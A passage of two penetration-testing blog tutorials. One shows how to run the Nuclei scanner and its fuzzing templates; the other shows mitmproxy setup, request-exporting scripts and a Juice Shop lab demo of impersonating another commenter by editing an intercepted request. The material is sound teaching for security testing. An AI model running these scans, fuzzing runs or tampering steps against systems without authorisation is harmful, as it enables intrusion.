-   **Community-Curated Templates**: At the heart of Nuclei&apos;s success is its utilization of community-curated templates for detecting both known and &quot;unknown&quot; vulnerabilities, allowing for customizable and precise scans.
-   **Comprehensive Cybersecurity Solution**: This guide provides a step-by-step exploration of Nuclei, from initial setup and template understanding to conducting first scans and analyzing results.
-   **Advanced Features and Applications**: Delve into Nuclei&apos;s advanced features, such as managing long-running scans and exploring fuzzing templates, to maximize its utility in your cybersecurity toolkit.

Join us as we delve into how Nuclei not only addresses today&apos;s cybersecurity challenges but also equips us to face the threats of tomorrow. This journey through Nuclei&apos;s functionalities will ensure you are well-equipped to enhance your digital defenses and maintain a proactive stance in the digital realm.

# Methodology update

In this chapter, we will incorporate two critical enhancements to our methodology:

-   **Leveraging Vulnerability Scanners:** Utilize vulnerability scanners to identify bugs that have been previously discovered in other web applications. This approach ensures that known vulnerabilities are not overlooked in your security assessments.
-   **Identifying Novel Web Vulnerabilities:** Focus on the detection of new web vulnerabilities, specifically within GET request parameters, by employing fuzzing techniques. This proactive strategy aids in uncovering potential security flaws that have not yet been cataloged.

# What Are Vulnerability Scanners?

In the vast and ever-evolving landscape of cybersecurity, one tool stands out as indispensable for fortifying our digital defenses: the vulnerability scanner. At its core, a vulnerability scanner is a specialized software designed to probe computer systems, networks, or applications for security weaknesses. These sophisticated tools play a critical role in the preemptive identification of vulnerabilities, allowing organizations and individuals to patch potential security breaches before they can be exploited by malicious actors.

The genesis of vulnerability scanners traces back to the early days of network computing, born out of the necessity to protect burgeoning digital infrastructures from emerging threats. Over the years, these scanners have evolved from simple, command-line interfaces to complex systems equipped with graphical user interfaces (GUIs), real-time analytics, and integrations with other cybersecurity tools.

There are several types of vulnerability scanners, each serving a distinct purpose:

-   **Network-based scanners** focus on identifying vulnerabilities in networked devices and servers, scanning for open ports, and misconfigured firewalls.
-   **Web application scanners** delve into web applications to find security flaws like SQL injection and cross-site scripting vulnerabilities.
-   **Wireless scanners** are tailored to detect security issues within wireless networks, ensuring that Wi-Fi networks are secure and not prone to attacks.
-   **Database scanners** aim to uncover vulnerabilities within databases, a critical component given the sensitive information they often hold.

The significance of vulnerability scanners goes beyond merely listing potential security flaws; they offer detailed insights into the severity of these vulnerabilities and provide recommendations for remediation. This proactive approach to security is a cornerstone of modern cybersecurity strategies, enabling organizations to stay one step ahead of potential threats.

As we delve deeper into the age of digital transformation, the role of vulnerability scanners will only grow in importance. They are not just tools but sentinels on the walls of our digital fortresses, guarding against the ceaseless tide of cyber threats. In this ongoing battle for cyber safety, understanding and leveraging vulnerability scanners is not just advisable; it&apos;s imperative.

The importance of vulnerability scanners in our digital defense arsenal cannot be overstated. These tools scan our networks, systems, and applications, hunting for weaknesses that could be exploited by cyber adversaries. Among the myriad of options available in the cybersecurity landscape, one tool has risen to prominence for its unique approach and effectiveness: Nuclei.

# What is Nuclei?

[Nuclei](https://github.com/projectdiscovery/nuclei) stands at the forefront of vulnerability scanning technology, a testament to what can be achieved when innovation meets the pressing needs of cybersecurity. Developed by the visionary team at [ProjectDiscovery](https://github.com/projectdiscovery), Nuclei is not merely another entry in the catalog of vulnerability scanners. It is a purpose-built tool designed to revolutionize the way we approach vulnerability detection and analysis.

**Key Highlights of Nuclei:**

-   **Template-based Scans:** Nuclei distinguishes itself with its template-driven approach. This innovation allows users to conduct highly specific and customizable scans, focusing on the vulnerabilities that matter most to their organization’s security posture.
-   **Unmatched Speed and Efficiency:** In the fast-paced world of cybersecurity, where threats evolve by the second, Nuclei’s ability to perform rapid, yet thorough scans is invaluable. It ensures that organizations can stay ahead of potential vulnerabilities, safeguarding their digital assets more effectively.
-   **A Flourishing Community:** The strength of Nuclei lies not just in its technical capabilities, but also in the vibrant community that supports it. Security professionals from around the globe contribute to its ever-growing repository of templates, ensuring that Nuclei remains on the cutting edge of vulnerability detection.
-   **Seamless Integration:** Understanding the importance of interoperability in cybersecurity, Nuclei is designed to integrate effortlessly with existing security tools and workflows. This makes it an indispensable addition to any security team’s toolkit, enhancing their capabilities without disrupting established processes.

# Getting Started with Nuclei

Starting your adventure with Nuclei is straightforward, designed to empower both experienced and novice cybersecurity enthusiasts to bolster their defense mechanisms efficiently. This guide will walk you through the initial steps, focusing on program installation and the foundational concept of templates for vulnerability detection.

## Installation

Installing Nuclei is a hassle-free process, accommodating various platforms. There are two main avenues for installation:

-   **Using Go**: If you have Go installed on your system, Nuclei can be easily set up using package managers with a simple command. This method ensures that you&apos;re always running the most current version of the software.

```bash
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

```

-   **Direct Download**: For those without Go, the latest [release of Nuclei](https://github.com/projectdiscovery/nuclei/releases) can be directly downloaded from its GitHub repository. This option provides flexibility for users across different operating setups.

Before proceeding with the installation, verify that your system meets the necessary prerequisites for the chosen method. For the latest installation instructions and to choose the best option for your needs, visit the official Nuclei GitHub page: [https://github.com/projectdiscovery/nuclei](https://github.com/projectdiscovery/nuclei).

## Understanding Nuclei Templates

At the core of Nuclei&apos;s efficiency in detecting vulnerabilities are its templates. These templates, formatted in YAML or JSON, serve as the blueprint for scanning, defining specific conditions and patterns that Nuclei searches for in target applications.

-   **Template-Based Detection**: By utilizing a collection of predefined templates, Nuclei can swiftly identify known vulnerabilities across a wide range of systems and applications. This method significantly reduces the time and complexity involved in setting up detailed scans.
-   **Customization and Community Support**: The ability to understand and modify template structures allows for tailored vulnerability assessment. Additionally, the vibrant Nuclei community contributes to a growing repository of templates, ensuring the tool remains updated with the latest threat intelligence.

Exploring the template documentation available on Nuclei&apos;s GitHub or diving into the community-curated templates will equip you with the knowledge to effectively harness the power of Nuclei in your security audits.

# Using nuclei

In our journey through understanding vulnerability scanners, we&apos;ve tackled theoretical aspects and delved into some intricate details of Nuclei. Now, it&apos;s time to shift our focus towards practical applications, exploring essential use cases you&apos;ll want to remember.

Launching Nuclei with the &quot;-h&quot; option unveils a plethora of settings, which might initially seem daunting. However, fret not; while many options fine-tune the tool&apos;s behavior, we&apos;ll concentrate on the fundamental features that are crucial for getting started.

![](/content/images/2024/04/image.png)

Nuclei help command

Nuclei, a template-driven tool aimed at detecting previously identified vulnerabilities, benefits greatly from regular updates. To keep your toolkit sharp, use the update flag to refresh your templates, typically housed in the default directory:

```bash
~/nuclei-templates/

```

![](/content/images/2024/04/image-2.png)

Nuclei update

![](/content/images/2024/04/image-3.png)

Nuclei template directory

An example within this directory, such as:

```bash
~/nuclei-templates/http/technologies/angular-detect.yaml

```

demonstrates the plethora of templates for software version detection. Take the Angular detection template; its syntax, while straightforward, is a prime example of how these templates aim to identify specific attributes—in this case, &quot;ng-version&quot;—within the responses from targeted URLs.

![](/content/images/2024/04/image-4.png)

Angular detection template in YAML format

If you inspect pages like juice-shop, you&apos;ll notice the &quot;ng-version&quot; attribute in action, demonstrating Angular&apos;s presence.

![](/content/images/2024/04/image-6.png)

Version of angular in the response

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    It is recommended to launch nuclei with --rate-limit to avoid throwing away the target page. In my case, I usually add &quot;--rate-limit 10&quot;.
  &lt;/div&gt;
&lt;/div&gt;

After running Nuclei, you should find a detailed output, categorizing vulnerabilities by their criticality, with many classified as informational.

```bash
nuclei -u &lt;url&gt;

```

![](/content/images/2024/04/image-5.png)

Nuclei execution

Nonetheless, you might find noteworthy findings, such as medium-risk application metrics or missing security headers—a different approach from what was discussed in our [second chapter](https://www.kayssel.com/post/hacking-web-2/).

![](/content/images/2024/04/image-7.png)

Application metrics

An intriguing observation might be the absence of Angular detection in your results. This occurs because Angular applications, as we&apos;ve learned, require browser simulation to fully reveal the content of their responses. This can be achieved by running Nuclei with the &quot;headless&quot; flag, a crucial step for a comprehensive initial scan.

![](/content/images/2024/04/image-9.png)

Headless execution

Nuclei offers numerous flags that tailor the scanning process to your needs, whether you&apos;re adjusting the level of output detail or controlling the volume of requests. Notable options include:

-   **\--severity**: Filters templates by their severity level (info, low, medium, high, critical), enabling targeted testing based on vulnerability severity.
-   **\--proxy**: Routes Nuclei&apos;s traffic through a specified proxy, useful for anonymizing scans, debugging, or scanning from specific locations. This flag supports HTTP, HTTPS, and SOCKS5 proxies.
-   **\-tags**: Allows the use of one or more tags to refine template selection based on vulnerability type, issue, or targeted system. For instance, to focus on SQL injection vulnerabilities, you might use `-tags sqli`.

## Exploring Advanced Nuclei Templates for Fuzzing

In our discussions so far, we&apos;ve navigated through using Nuclei for detecting known vulnerabilities, invaluable for external penetration testing across numerous servers. However, when it comes to web application penetration testing, identifying application-specific vulnerabilities requires a different approach. This is where fuzzing templates come into play.

[GitHub - projectdiscovery/fuzzing-templates: Community curated list of nuclei templates for finding “unknown” security vulnerabilities.](https://github.com/projectdiscovery/fuzzing-templates)

To leverage these fuzzing templates effectively, we&apos;ll need to target GET requests at various endpoints with parameters. A practical way to gather such endpoints involves using proxies. By creating a plugin that logs URLs during your exploration of the application (in case of using [mitmproxy](https://www.kayssel.com/post/proxy/)), you can amass a significant list of potential targets.

```bash
mitmdump -s export_urls.txt

```

```python
from mitmproxy import http

def request(flow: http.HTTPFlow) -&gt; None:
    # Abre el archivo cada vez que se captura una petición
    with open(&quot;urls.txt&quot;, &quot;a&quot;) as file:
        # Escribe la URL de la petición capturada en el archivo y añade un salto de línea
        file.write(flow.request.pretty_url + &quot;\n&quot;)

```

This method enables the accumulation of URLs while investigating an application. Additionally, tools like [Katana can be employed to directly collect parameters](https://www.kayssel.com/post/hacking-web-2/), offering a versatile approach to scanning application vulnerabilities.

```bash
katana -u &quot;&lt;url&gt;&quot; -f qurl -jc -headless -silent | nuclei 

```

After gathering a sufficient list of endpoints, filter those with parameters for fuzzing. If you haven&apos;t utilized Katana&apos;s one-liner, you can still prepare your list for fuzzing as follows:

```bash
cat urls.txt | grep &quot;192&quot; |  grep &quot;?&quot; | grep -v &quot;socket&quot; | sort -u &gt; urls_to_fuzz.txt
nuclei -t fuzzing_templates/ -list urls_to_fuzz.txt -fuzz -headless


```

![](/content/images/2024/04/image-10.png)

Fuzzing Execution

While initial runs may not yield results, this doesn&apos;t imply the absence of vulnerabilities, such as SQL injection or DOM XSS. Employing Nuclei with a proxy to analyze responses can reveal errors indicative of vulnerabilities, such as SQLI errors, not captured by current templates due to the lack of specific error patterns.

```bash
nuclei -t fuzzing-templates/ -list urls_to_fuzz.txt -fuzz --rate-limit 10 -headless -proxy http://127.0.0.1:8888

```

![](/content/images/2024/04/image-13.png)

Response contains SQLite error

In cases where known errors aren&apos;t detected by existing templates, customizing templates to include these patterns can enhance detection capabilities.

```bash
lab/web_hacking/nuclei/fuzzing-templates/sql

```

![](/content/images/2024/04/image-14.png)

SQLite errors currently included

![](/content/images/2024/04/image-11.png)

New error included

![](/content/images/2024/04/image-12.png)

Detection of vulnerability

As we progress, we&apos;ll delve deeper into the intricacies of the Nuclei template system, exploring how to craft a personalized vulnerability scanning engine that can identify a wider range of vulnerabilities, further enhancing our penetration testing toolkit.

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    This functionality has been updated and will soon incorporate the fuzzing nuclei templates in the default ones and will be usable with -dast.
  &lt;/div&gt;
&lt;/div&gt;

## Managing Long-Running Nuclei Scans with Save Points

In the realm of penetration testing, time is often of the essence. Nuclei, while powerful, can sometimes run lengthy scans that don&apos;t neatly fit into the tight schedules of a pentesting assignment. Recognizing this challenge, Nuclei incorporates a valuable feature designed to accommodate the dynamic pacing of penetration tests: the ability to save and resume scan progress.

When you&apos;re running a scan and need to pause—for instance, due to time constraints or the need to reallocate resources—simply interrupt the scan with Ctrl+C. This action triggers Nuclei to automatically generate a save file. This save file is crucial as it meticulously records the scan&apos;s current state, ensuring no progress is lost.

![](/content/images/2024/04/image-15.png)

Stop the execution

The beauty of this functionality lies in its simplicity and the flexibility it offers to penetration testers. When you&apos;re ready to resume the scan, you can use this save file to pick up exactly where you left off, ensuring a seamless continuation of your testing activities without the need to start from scratch.

![](/content/images/2024/04/image-16.png)

Execution from save point

# Conclusions

In conclusion, Nuclei emerges as a pivotal tool in the cybersecurity landscape, offering a comprehensive, template-driven approach to vulnerability scanning. This guide highlights Nuclei&apos;s unique position, underpinned by community-driven innovation and its capability to meet the nuanced demands of modern cybersecurity. As we delve into its functionalities, from basic installations to leveraging advanced features like fuzzing templates and managing long scans, it&apos;s evident that Nuclei is more than just a tool; it&apos;s an integral part of a proactive defense strategy against the ever-evolving cyber threats.

For those keen on deepening their understanding of Nuclei and maximizing its potential, [the Project Discovery guide](https://docs.projectdiscovery.io/tools/nuclei/overview) serves as an invaluable resource. It not only provides detailed instructions and insights into the tool&apos;s extensive capabilities but also connects users with a community of cybersecurity professionals dedicated to refining and expanding Nuclei&apos;s applications. Visiting the Project Discovery guide will equip you with the knowledge and skills to harness Nuclei&apos;s full power, ensuring your digital environments are fortified against the challenges of tomorrow.

As we conclude, the importance of tools like Nuclei in safeguarding our digital frontiers cannot be overstated. In the ongoing battle for cybersecurity, knowledge, and preparedness are key. Nuclei, with its innovative approach and the support of a vibrant community, offers a beacon of hope, showcasing the potential of collaborative efforts in overcoming the cyber threats of the digital age.</content:encoded><author>Ruben Santos</author></item><item><title>From Novice to Ninja: Proxy Techniques in Pentesting</title><link>https://www.kayssel.com/post/proxy</link><guid isPermaLink="true">https://www.kayssel.com/post/proxy</guid><description>Embark on a voyage through proxy-powered web penetration testing. From configuring mitmproxy to uncovering vulnerabilities in real-world applications, discover the tools and tactics essential for navigating the ever-evolving cybersecurity landscape.</description><pubDate>Sun, 24 Mar 2024 16:54:59 GMT</pubDate><content:encoded># Introduction: Navigating the Web Penetration Testing Seas

Welcome aboard, digital explorers! You&apos;re about to embark on an extraordinary voyage through the treacherous yet thrilling waters of web penetration testing. In this realm, proxies are more than mere tools; they are our compass and map, guiding us through the murky depths of web applications to uncover hidden treasures and lurking dangers alike.

Proxies, the unsung heroes of the cybersecurity world, offer us a unique vantage point from which to observe, intercept, and manipulate the data flowing between our browsers and the vast expanse of the internet. They are the linchpins in our quest to fortify our digital fortresses against the relentless onslaught of cyber threats.

In this chapter, we&apos;ll be charting a course through the intricate network of proxies, with a special focus on mitmproxy, a versatile and powerful ally in our penetration testing arsenal. Whether you&apos;re a seasoned sailor of the cyber seas or setting foot on the deck for the first time, you&apos;ll find valuable insights and strategies to enhance your web security endeavors.

## Setting Sail with Proxies

Our journey begins with an exploration of the diverse species of proxies that inhabit the digital ocean. From the shadowy realms of Anonymous Proxies to the bustling trade routes guarded by Reverse Proxies, we&apos;ll navigate the complexities of these vital tools. Understanding their unique characteristics and applications will equip us with the knowledge to choose the right proxy for each mission.

## Arming Ourselves for Adventure

With our bearings set, we&apos;ll delve into the arsenal of tools at our disposal, with a spotlight on mitmproxy. This lightweight yet formidable tool will be our primary instrument in dissecting and defending web applications. Through hands-on guidance and practical examples, we&apos;ll master the art of using mitmproxy to unveil vulnerabilities and safeguard our digital domains.

## The Craft of Configuration

Before diving into the action, we&apos;ll lay the groundwork by configuring our environment. Setting up mitmproxy and integrating it with our browsers and systems is akin to tuning our instruments before a concert—a step essential for the symphony of security testing to proceed harmoniously.

As we sail towards the horizon, we&apos;ll engage in real-world scenarios, employing our proxy to intercept, examine, and manipulate web traffic. From the bustling marketplaces of OWASP Juice Shop to the hidden coves of custom applications, we&apos;ll apply our skills in live environments, bridging the gap between theory and practice.

## Enriching Our Voyage with Scripts

Our adventure is further enhanced by the magic of scripts, extending mitmproxy&apos;s capabilities to suit our every need. Whether it&apos;s exporting requests for further analysis or automating sophisticated attack sequences, we&apos;ll discover how to tailor our toolkit to become the ultimate web penetration testing craftsman.

As we chart this course together, our journey will be illuminated by the twin stars of curiosity and diligence. With each challenge conquered and mystery unraveled, we&apos;ll grow not just as testers but as guardians of the digital realm.

So, fasten your seatbelts and prepare your tools—our voyage into the world of web penetration testing and proxies is about to begin. The seas may be rough and the challenges daunting, but the rewards of securing our digital horizons are unparalleled. Welcome to the adventure of a lifetime.

# Types of Proxies

In the vast ocean of proxies, there are several species, each adapted to its unique environment. Let&apos;s meet some of the most common ones:

-   **Anonymous Proxies**: The ninjas of the proxy world. They hide your IP address, making your online activities invisible to prying eyes. Perfect for testers who need to operate without leaving a trace.
-   **Transparent Proxies**: These guys don&apos;t hide your IP address but still forward your requests. They&apos;re like the honest workers of the internet, often used for caching web pages and controlling employee internet usage.
-   **Reverse Proxies**: The gatekeepers. They sit in front of web servers, directing incoming traffic to the correct destination. They&apos;re great for balancing loads and providing additional security layers.
-   **HTTP vs. SOCKS Proxies**: The classic debate. HTTP proxies understand and interpret web traffic, making them ideal for viewing and modifying web pages. SOCKS proxies, on the other hand, are like the versatile adventurers—they handle all types of traffic, not just web pages, making them a go-to for testers working with various applications.

Each type of proxy has its stage and script in the theater of web penetration testing. Choosing the right proxy is like selecting the right tool for a job—it can make all the difference in how effectively you can test and secure a web application.

# Setting Up and Tooling Up for Success

Now that we&apos;ve navigated the waters of proxy types, it&apos;s time to gear up and get our hands dirty. Setting up a proxy for web penetration testing might sound like rocket science, but fear not! It&apos;s more like assembling a high-tech LEGO set. Let&apos;s talk about the toolkit that&apos;s going to make you the master builder of web security.

## Burp Suite

First up is the legendary Burp Suite, a favorite among web security professionals. Think of it as your digital Swiss Army knife, equipped with everything from basic mapping to advanced vulnerability exploitation tools. It&apos;s like having a superhero sidekick, ready to leap into action, whether you&apos;re just getting started or diving deep into the vulnerabilities of a web application.

## OWASP ZAP

Next, we have OWASP ZAP (Zed Attack Proxy), the open-source wonder. It&apos;s the Robin to your Batman, offering a powerful range of tools to detect vulnerabilities in web applications. With its user-friendly interface and community-backed support, ZAP makes sure you&apos;re well-equipped to tackle security threats head-on.

## Mitmproxy

Last but definitely not least, meet mitmproxy, the tool we&apos;ll be getting up close and personal with throughout our series. This lightweight proxy is like the agile spy of the internet, capable of intercepting, inspecting, modifying, and replaying web traffic. Its console interface might remind you of piloting a spaceship with text commands, but once you get the hang of it, you&apos;ll be maneuvering through web traffic like a pro. We&apos;re going to spend a lot of time with mitmproxy, uncovering the secrets of web applications and learning how to shield them from potential threats. So buckle up, it&apos;s going to be an exciting ride!

### Setting the Stage

Before we jump into action, let&apos;s set the stage. Configuring your proxy involves a few key steps: installing the software, setting your browser to route traffic through the proxy, and ensuring your proxy is listening to the right port. It&apos;s like tuning your musical instrument before a concert; everything needs to be pitch-perfect for the performance ahead.

In this case, I am going to show you how to do it with mitmproxy, but if you are using another one like burp, the steps are very similar, in the end you just need to create a trusted certificate and install it in your favorite browser.

Anyway, the different steps can be found in the official documentation:

[Certificates](https://docs.mitmproxy.org/stable/concepts-certificates/)

First off, we need to set up FoxyProxy on our browser to listen on the right port. I’ve chosen port 8888 for this demonstration. This step is like telling FoxyProxy where to direct the web traffic for our investigative purposes.

![](/content/images/2024/03/image-37.png)

Foxyproxy configuration

With FoxyProxy configured, it’s time to bring mitmproxy into play. Open your terminal and enter the magic incantation:

```bash
mitmproxy -p 8888

```

This command starts mitmproxy and tells it to keep an eye on port 8888, our chosen gateway to the web&apos;s hidden secrets.

Navigate to &quot;mitm.it&quot; using the browser where you’ve set up FoxyProxy. Here, you&apos;ll be greeted by a dashboard offering various certificates. Download the one for Linux (or your respective operating system). Next up, we’re heading to browser settings to make it trust our new friend, the mitmproxy certificate.

![](/content/images/2024/03/image-29.png)

mitm.it domain

Installing the Certificate in Firefox (Chrome users, your journey is similar):

-   Open Firefox settings and head over to the ‘View Certificates’ section.
-   Click on ‘Import’ and follow the prompts, ticking all the right boxes to secure Firefox’s trust in our certificate.

![](/content/images/2024/03/image-32.png)

View Firefox certificates

![](/content/images/2024/03/image-33.png)

Import certificates

With the certificate installed, visiting the OWASP Juice Shop (or any web application you&apos;re testing) should unveil all its web traffic in mitmproxy&apos;s console, like lifting the curtain on a stage.

![](/content/images/2024/03/image-28.png)

Panel with all requests

To streamline your web testing adventures, consider creating a configuration file for mitmproxy. This little cheat sheet automatically sets your preferred settings, like the port number and any specific scripts you want to run (we’ll dive into the power of scripts later).

![](/content/images/2024/03/image-36.png)

Configuration file

Here’s a pro tip: Take a moment to explore mitmproxy’s tutorials. They’re like a treasure map to mastering this tool, guiding you through basic to advanced maneuvers. And don’t worry if you see a lot of Vim-style shortcuts; if you’ve ventured through the realms of Vim before, you’ll feel right at home.

[User Interface](https://docs.mitmproxy.org/stable/mitmproxytutorial-userinterface/)

### Why mitmproxy?

You might wonder why we&apos;re spotlighting mitmproxy in our series. It&apos;s simple: mitmproxy offers a blend of simplicity, power, and flexibility unmatched by many other tools. Whether you&apos;re a rookie or a seasoned pro, mitmproxy scales with your skills, offering deep insights into web traffic and vulnerabilities. Plus, its open-source nature means you&apos;re joining a community of experts dedicated to making the web a safer place.

# Practical Use Cases in Penetration Testing

Entering the heart of our adventure, it&apos;s time to explore the real-world application of proxies in web penetration testing. Armed with our tools, especially mitmproxy, we&apos;re ready to tackle the challenges that lie ahead. In this section, we&apos;ll outline various scenarios where proxies become the linchpin of our testing strategy, demonstrating their value in uncovering and exploiting vulnerabilities in web applications.

## Interception and Modification of Requests and Responses

One of the core strengths of using proxies like mitmproxy is the ability to intercept and modify HTTP/HTTPS requests and responses in real-time. This capability allows us to:

-   **Inspect Headers and Cookies**: By examining the headers and cookies, we can uncover security flaws such as insecure settings or vulnerable tokens.
-   **Manipulate Data**: Altering inputs and outputs enables us to test the application&apos;s handling of unexpected or malicious data, identifying potential input validation and sanitization issues.

## Analyzing Encrypted Traffic

With the majority of web applications using HTTPS for security, it&apos;s crucial to be able to analyze encrypted traffic. Proxies allow us to decrypt and inspect this traffic, which is essential for:

-   **Identifying Sensitive Data Exposure**: Revealing how an application encrypts and transmits sensitive information can highlight potential data leakage points.
-   **Testing SSL/TLS Configuration**: Ensuring that the application&apos;s encryption settings are up to snuff and not vulnerable to attacks like SSL stripping or vulnerable cipher suites.

## Automating Custom Attacks

Proxies not only let us perform manual testing but also automate custom attacks. This is particularly useful for:

-   **Replaying and Customizing Attacks**: Once we identify a request that leads to a vulnerability, we can replay it with modifications to explore the depth and impact of the issue.
-   **Crafting Sophisticated Attack Sequences**: By automating attacks, we can simulate complex attack sequences that would be time-consuming or difficult to perform manually.

## Identifying Logic Flaws and Session Management Issues

Logic flaws and session management vulnerabilities can be subtle and hard to detect. Using proxies, testers can:

-   **Session Hijacking and Fixation**: Intercepting and modifying session tokens can reveal vulnerabilities in how sessions are managed and protected.
-   **Testing Access Controls**: By modifying user roles or permissions in requests, we can test the effectiveness of access control mechanisms.

# Real-World Application: Juice Shop

Let&apos;s dive into the practical arena with our case study, the Juice Shop. This section will walk you through how I leveraged proxies, specifically mitmproxy, to unearth vulnerabilities and perform tests that echo real-world scenarios. Through hands-on examples from Juice Shop, we&apos;ll see the pivotal role proxies play in bridging theory with the gritty reality of web security.

One fascinating experiment to conduct with an application like Juice Shop involves exploring whether a user can leave comments while masquerading as another user. This test shines a light on how the application manages comment functionalities and the potential loopholes therein.

## Setting Up the Stage

First things first, let’s get our proxy, mitmproxy, into interception mode. Depending on where your testing environment is hosted, you&apos;ll adjust the viewing filter accordingly. For those working with a remote setup, you might use a command similar to:

```bash
set view_filter &apos;192.168.20.120&apos;

```

![](/content/images/2024/03/image-35.png)

Filter by target IP

If you’re tinkering directly on your local machine, `localhost` will be your target.

## The Test Run

With mitmproxy lying in wait, let&apos;s initiate a comment post to understand the mechanics behind it. Intercepting the request unveils that both the author&apos;s name and the message content are neatly packed in the request body, ripe for modification.

![](/content/images/2024/03/image-48.png)

Functionality to post comments

![](/content/images/2024/03/image-43.png)

Intercepted requests

To edit the request, a simple dance of pressing &quot;e&quot; for edit and &quot;a&quot; for accessing the request body gets us to the editor set by your `$EDITOR` environment variable. Here, in my playground, I decided to switch the author name to impersonate another user.

![](/content/images/2024/03/image-44.png)

Message modified and ready to send

After tweaking the request to our liking and pressing &quot;a&quot; to send it off, mitmproxy confirms our mischief has been successfully executed by showing the altered comment now attributed to a different user.

![](/content/images/2024/03/image-45.png)

Successful response

## Watching the Dominoes Fall

&lt;details&gt;
&lt;summary&gt;To wrap up our little experiment:&lt;/summary&gt;

```bash
set view_filter &apos;&apos;

```
&lt;/details&gt;


Clearing the view filter allows us to witness the outcome in the product reviews section—our comment, now falsely attributed to another user, standing as a testament to the discovered vulnerability.

![](/content/images/2024/03/image-47.png)

Commented by impersonating another user

## The Takeaway

This scenario offers just a glimpse into the utility of proxies in a security audit. By scrutinizing feature behaviors and toying with parameters, we can uncover oversights not immediately apparent or reachable by automated scanners like Burp Suite or Nuclei. The nuanced vulnerabilities we manually unravel through proxies can be both challenging and rewarding, underlining the importance of mastering this tool in your security toolkit.

# Enhancing mitmproxy with Scripts

One of the most exhilarating aspects of mitmproxy lies in its versatility, thanks to its plugin system. This feature is a game-changer, enabling you to tailor the tool to your heart&apos;s desire. Consider this: with just a few lines of code, you can forge a command named &quot;exporter&quot; that sieves through your marked requests, exporting them in their raw glory to a specified directory.

### The Exporter Plugin

```python
from mitmproxy import ctx, http
from mitmproxy import command, types, flow
import os

class Exporter:
    EXPORT_DIR = os.getcwd() + &quot;/raw_requests&quot;

    def format_request(self, flow: http.HTTPFlow) -&gt; str:
        request_line = f&quot;{flow.request.method} {flow.request.pretty_url} {flow.request.http_version}&quot;
        headers = &apos;\n&apos;.join(f&quot;{name}: {value}&quot; for name, value in flow.request.headers.items())
        body = flow.request.get_text(strict=False)
        return f&quot;{request_line}\n{headers}\n\n{body}&quot;

    @command.command(&quot;exporter.export_marked&quot;)
    def export_marked(self, flows: types.Sequence[flow.Flow], dir: str = EXPORT_DIR) -&gt; None:
        if not os.path.exists(dir):
            os.makedirs(dir)
        for flow in flows:
            if flow.marked:
                filename = f&quot;{flow.request.host}-{flow.request.method}-{int(flow.request.timestamp_start)}.txt&quot;
                filepath = os.path.join(dir, filename)
                raw_request = self.format_request(flow)
                with open(filepath, &quot;w&quot;) as file:
                    file.write(raw_request)
                ctx.log.info(f&quot;Exported request: {filepath}&quot;)

addons = [
    Exporter()
]


```

To deploy this script, simply append it to mitmproxy with the `-s` flag, like so:

```bash
mitmproxy -s requests_dumper.py

```

Or, integrate it into your configuration file for a seamless experience.

## Practical Magic with Commands

Imagine you’re dissecting a login sequence and wish to archive its requests for further analysis or fuzzing. Mark the relevant requests and unleash your custom command to funnel them into the &quot;requests&quot; directory, ready for any operation you plan next.

![](/content/images/2024/03/image-39.png)

Login requests

![](/content/images/2024/03/image-40.png)

Marked requests

![](/content/images/2024/03/image-41.png)

Using the command to export requests

![](/content/images/2024/03/image-42.png)

Result of raw requests

## A Twist with mitmdump

Mitmdump, mitmproxy’s CLI sibling, offers a parallel path. It stands guard, diligently archiving all your navigational requests into the &quot;raw\_requests&quot; directory.

```python
from mitmproxy import http
import os

EXPORT_DIR = &quot;raw_requests&quot;

def ensure_dir_exists(directory):
    if not os.path.exists(directory):
        os.makedirs(directory)

def request(flow: http.HTTPFlow):
    ensure_dir_exists(EXPORT_DIR)
    
    # Construye un nombre de archivo basado en detalles de la solicitud
    filename = f&quot;{flow.request.host}-{flow.request.method}-{int(flow.request.timestamp_start)}.txt&quot;
    filepath = os.path.join(EXPORT_DIR, filename)
    
    # Formatea la solicitud en el formato raw especificado
    request_line = f&quot;{flow.request.method} {flow.request.pretty_url} {flow.request.http_version}&quot;
    headers = &apos;\n&apos;.join(f&quot;{name}: {value}&quot; for name, value in flow.request.headers.items())
    body = flow.request.get_text(strict=False)
    
    raw_request = f&quot;{request_line}\n{headers}\n\n{body}&quot;
    
    # Guarda la solicitud formateada en el archivo
    with open(filepath, &quot;w&quot;) as file:
        file.write(raw_request)



```

Activate it with a `-s` flag:

```bash
mitmdump -s ~/Tools/mitmproxy/raw_dumper.py

```

This is but a peek into the realm of plugins and scripts with mitmproxy. Imagine coupling this with tools like ffuf or katana, orchestrating a symphony of tests from the comfort of your proxy. The possibilities? Limitless.

# Conclusion: Charting the Course Forward

As we dock back into the harbor after our voyage across the complex seas of web penetration testing, it&apos;s time to reflect on the journey we&apos;ve undertaken together. Through the mists of technical challenges and the storms of cybersecurity threats, proxies have been our steadfast allies, illuminating the path to understanding and securing web applications.

## The Power of Proxies Unleashed

Our exploration revealed the critical role proxies like mitmproxy play in the arsenal of a web penetration tester. By serving as the lens through which we can inspect, intercept, and manipulate web traffic, proxies empower us to uncover vulnerabilities that could otherwise lay hidden beneath the surface. They are not just tools but extensions of our will to protect and secure the digital domain.

## Mastery Through Practice

The hands-on examples, from setting up our environment to delving into the inner workings of applications like Juice Shop, demonstrated the practical application of proxies in real-world scenarios. These exercises underscored a fundamental truth: mastery in web penetration testing comes through practice, experimentation, and a relentless pursuit of knowledge.

## In Closing

Our voyage through the realm of proxies and web penetration testing may have reached its conclusion, but the adventure of learning and exploration never truly ends. Armed with the knowledge and skills you&apos;ve acquired, you are now a beacon of security in the digital age, a protector of the vast web applications that power our world.

